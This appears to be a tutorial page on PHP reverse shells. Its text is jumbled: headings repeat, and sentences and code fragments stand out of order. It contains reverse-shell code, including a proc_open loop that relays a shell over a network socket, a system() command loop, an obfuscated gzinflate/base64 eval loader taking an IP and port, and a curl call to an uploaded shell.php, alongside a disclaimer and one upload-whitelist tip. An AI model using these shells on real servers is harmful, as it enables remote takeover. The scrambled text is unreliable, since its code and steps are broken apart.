PHP provides multiple wrappers and system execution pathways to achieve a reverse shell. The method used often depends on the specific functions enabled in the target server's php.ini configuration.

1. The Single-Line Command Injection Payloads: the simplest form for execution via a web browser:
if (is_resource($process)) proc_close($process);
curl http://target.com/uploads/shell.php
A reverse shell is useless if the server cannot reach the internet.
elseif (function_exists('system')) while ($cmd = fgets($sock)) ob_start(); system($cmd); fwrite($sock, ob_get_clean() . "\n");
Depending on the target environment, different PHP payloads can be used. Below are three common methods, ranging from basic one-liners to robust scripts.

1. The Simple Single-Command Exec Method
Disclaimer: The following examples are provided strictly for educational purposes, authorized penetration testing, and security auditing.
$evalCode = gzinflate(base64_decode($payload)); $evalArguments = " ". $port." ". $ip; $tmpdir ="C:\\windows\\temp"; chdir($tmpdir)
Ensure window resizing works properly by setting the environment variables to match your local terminal size. Open a separate local terminal window, run stty size to find your rows and columns, and then execute the following inside your reverse shell:
To understand a reverse shell, you must first understand a bind shell.
2. Base64 Encoding Payloads
PHP reverse shells vary in complexity, from simple one-liners to feature-rich scripts.
Use a whitelist of allowed file extensions (e.g., .jpg, .pdf) rather than a blacklist.
You can download it from the Pentest Monkey GitHub repository.
Type reset and hit enter. If asked for a terminal type, enter xterm-256color.
array("pipe", "r"), // stdin 1 => array("pipe", "w"), // stdout 2 => array("pipe", "w") // stderr ); // Spawn the shell process $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) exit(1); // Make streams non-blocking stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($daemon, 0); while (1) // Check if the connection or the shell process has terminated if (feof($daemon)) break; if (feof($pipes[1])) break; $read_a = array($daemon, $pipes[1], $pipes[2]); $num_changed_streams = stream_select($read_a, $write_a, $error_a, null); // Read from network, write to shell stdin if (in_array($daemon, $read_a)) $input = fread($daemon, $chunk_size); fwrite($pipes[0], $input); // Read from shell stdout, write to network if (in_array($pipes[1], $read_a)) $input = fread($pipes[1], $chunk_size); fwrite($daemon, $input); // Read from shell stderr, write to network if (in_array($pipes[2], $read_a)) $input = fread($pipes[2], $chunk_size); fwrite($daemon, $input); fclose($daemon); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); ?>

Step-by-Step Implementation Guide